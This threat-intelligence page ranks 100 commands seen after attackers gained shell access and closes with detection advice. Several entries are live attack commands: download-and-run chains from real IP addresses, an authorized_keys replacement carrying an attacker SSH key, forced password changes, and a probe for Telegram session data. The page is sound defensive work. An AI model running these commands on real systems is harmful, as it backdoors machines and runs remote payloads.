Updated: February 2026

Top 100 Malicious Commands

The commands attackers most often execute after gaining access to a system. Useful for intrusion detection and incident response.

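4147 commands in 24h. Each entry below shows the command after a "$" prompt marker, followed by the number of source IPs that ran it and the number of times it was seen (for example, "24 IPs222x" reads as 24 IPs, 222 executions). Some long commands are cut off in this listing, and a few entries are captured prompt text or fragments of multi-line scripts rather than complete commands.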
1.
$/bin/./uname -s -v -n -r -m
24 IPs222x
2.
$Enter new UNIX password:
94 IPs198x
3.
$lockr -ia .ssh
150 IPs191x
4.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
26 IPs165x
5.
$uname -a
133 IPs160x
6.
$cat /proc/cpuinfo | grep model | grep name | wc -l
123 IPs153x
7.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
122 IPs149x
8.
$whoami
118 IPs148x
9.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
119 IPs147x
10.
$cat /proc/cpuinfo | grep name | wc -l
121 IPs146x
11.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
118 IPs145x
12.
$uname -m
122 IPs144x
13.
$crontab -l
118 IPs143x
14.
$lscpu | grep Model
117 IPs141x
15.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
119 IPs141x
16.
$uname
112 IPs139x
17.
$w
111 IPs139x
18.
$which ls
112 IPs134x
19.
$top
110 IPs134x
20.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
108 IPs131x
21.
$uname -s -v -n -m 2 > /dev/null
52 IPs131x
22.
$ls -lh $(which ls)
103 IPs123x
23.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
53 IPs123x
24.
$uname -m 2 > /dev/null
26 IPs87x
25.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
54 IPs62x
26.
$echo hello
8 IPs50x
27.
$uname -s -v -n -r -m
15 IPs41x
28.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs14x
29.
$/ip cloud print
9 IPs14x
30.
$curl2
1 IPs14x
31.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs14x
32.
$cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh
5 IPs13x
33.
$locate D877F783D5D3EF8Cs
10 IPs10x
34.
$ifconfig
8 IPs8x
35.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
7 IPs7x
36.
$echo Hi | cat -n
7 IPs7x
37.
$rm -rf /data/local/tmp/*
2 IPs6x
38.
$ps -ef | grep '[Mm]iner'
6 IPs6x
39.
$shell
3 IPs6x
40.
$ps | grep '[Mm]iner'
6 IPs6x
41.
$cat /proc/cpuinfo
6 IPs6x
42.
$system
3 IPs5x
43.
$nproc
2 IPs5x
44.
$if [ [ ! -d ${HOME}/.ssh ] ]
2 IPs5x
45.
$uname -s -m
4 IPs4x
46.
$q
2 IPs4x
47.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
2 IPs4x
48.
$then
2 IPs4x
49.
$Accept-Encoding: gzip
2 IPs4x
50.
$chmod 0755 /data/local/tmp/nohup
2 IPs4x
51.
$pm path com.google.home.tv
2 IPs4x
52.
$tcpdump -D
1 IPs3x
53.
$sh
3 IPs3x
54.
$rm /data/local/tmp/tv.apk
2 IPs3x
55.
$pm path com.ufo.miner
2 IPs3x
56.
$getprop ro.build.version.sdk
1 IPs3x
57.
$enable
3 IPs3x
58.
$/data/local/tmp/nohup su -c /data/local/tmp/log
1 IPs2x
59.
$cd /data/local/tmp/; rm -rf *; busybox wget http://103.116.52.126/abc1.sh; sh abc1.sh; wget http://103.116.52.126/abc1.sh; sh abc1.sh; curl http://103.116.52.126/abc1.sh; sh abc1.sh; busybox wget http://103.116.52.126/abc2.sh; sh abc2.sh; wget http://103.116.52.126/abc2.sh; sh abc2.sh; curl http://103.116.52.126/abc2.sh; sh abc2.sh; busybox wget http://103.116.52.126/abc3.sh; sh abc3.sh; wget http://103.116.52.126/abc3.sh; sh abc3.sh; curl http://103.116.52.126/abc3.sh; sh abc3.sh;
2 IPs2x
60.
$am start -n com.ufo.miner/com.example.test.MainActivity
1 IPs2x
61.
$/data/local/tmp/nohup /data/local/tmp/trinity
1 IPs2x
62.
$while read i
2 IPs2x
63.
$am start -n com.google.home.tv/com.example.test.MainActivity
1 IPs2x
64.
$/data/local/tmp/nohup /data/local/tmp/log
1 IPs2x
65.
$rm .s; exit
2 IPs2x
66.
$ps | grep trinity
1 IPs2x
67.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
2 IPs2x
68.
$ps | grep rig
1 IPs2x
69.
$rm -f /data/local/tmp/ufo.apk
1 IPs2x
70.
$ps | grep log
1 IPs2x
71.
$pm install /data/local/tmp/tv.apk
1 IPs2x
72.
$chmod 0755 /data/local/tmp/trinity
1 IPs2x
73.
$pm install /data/local/tmp/ufo.apk
1 IPs2x
74.
$chmod 0755 /data/local/tmp/log
1 IPs2x
75.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
1 IPs2x
76.
$echo "abcd1234\nGDq9YDyMt7cc\nGDq9YDyMt7cc\n"|passwd
1 IPs1x
77.
$echo "Password1\nqswOLAd4ifCu\nqswOLAd4ifCu\n"|passwd
1 IPs1x
78.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox OAXAN
1 IPs1x
79.
$echo "Password1\nnhzVKeW2kznz\nnhzVKeW2kznz\n"|passwd
1 IPs1x
80.
$echo "Passw0rd\nLbkrOeN4GmXF\nLbkrOeN4GmXF\n"|passwd
1 IPs1x
81.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox EWGDZ
1 IPs1x
82.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "XK8wyfte\nXK8wyfte" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
83.
$echo "P@ssw0rd\ncIVX8wnpBUNE\ncIVX8wnpBUNE\n"|passwd
1 IPs1x
84.
$echo "E1ementa!5\nVgmnQPzed1QX\nVgmnQPzed1QX\n"|passwd
1 IPs1x
85.
$echo "888888\nZeT0bu1LiUS2\nZeT0bu1LiUS2\n"|passwd
1 IPs1x
86.
$echo "1q2w3e4r5t6y\nc6W4wklHM4Xk\nc6W4wklHM4Xk\n"|passwd
1 IPs1x
87.
$cd /data/local/tmp/; wget http://212.85.24.46:84/cat.sh || curl http://212.85.24.46:84/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android
1 IPs1x
88.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "OAKTuBfB\nOAKTuBfB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
89.
$echo "1q2w3e4r5t6y\n6CbLN6iupzh5\n6CbLN6iupzh5\n"|passwd
1 IPs1x
90.
$echo "123\nsN0wot835d8Y\nsN0wot835d8Y\n"|passwd
1 IPs1x
91.
$echo "123\nTAM8sqbINqE2\nTAM8sqbINqE2\n"|passwd
1 IPs1x
92.
$echo "123\nOfuPWA7oGCAw\nOfuPWA7oGCAw\n"|passwd
1 IPs1x
93.
$cd /data/local/tmp/; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; busybox curl http://94.156.152.217/kla.sh; sh kla.sh
1 IPs1x
94.
$echo "123\nIon55ygkCupL\nIon55ygkCupL\n"|passwd
1 IPs1x
95.
$echo "ionela\n8gh1L0KSvx8N\n8gh1L0KSvx8N\n"|passwd
1 IPs1x
96.
$echo "1234\ngEMKhmepHGya\ngEMKhmepHGya\n"|passwd
1 IPs1x
97.
$echo "guest\nqHzZW803CeSw\nqHzZW803CeSw\n"|passwd
1 IPs1x
98.
$echo "guest\na8lkKSoPk72U\na8lkKSoPk72U\n"|passwd
1 IPs1x
99.
$echo "gast\nSYXz70enXjZt\nSYXz70enXjZt\n"|passwd
1 IPs1x
100.
$echo "gast\nPUVHYQ0KQP04\nPUVHYQ0KQP04\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

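These commands can be used to build detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor your logs for these patterns to detect intrusions. Many entries (uname, whoami, w, top, crontab -l) are also routine administrative commands, so a rule that fires on any one of them alone will be noisy. Alert instead on the distinctive behaviours in the list, such as replacing .ssh/authorized_keys, clearing attributes with chattr -ia on .ssh, piping passwords into passwd, emptying /etc/hosts.deny, or downloading a script and immediately running it with sh. Rapid bursts of the common reconnaissance commands from a single new session are also worth alerting on. The IP addresses, keys, passwords and file names shown are point-in-time indicators from the sampled window and should be treated as such.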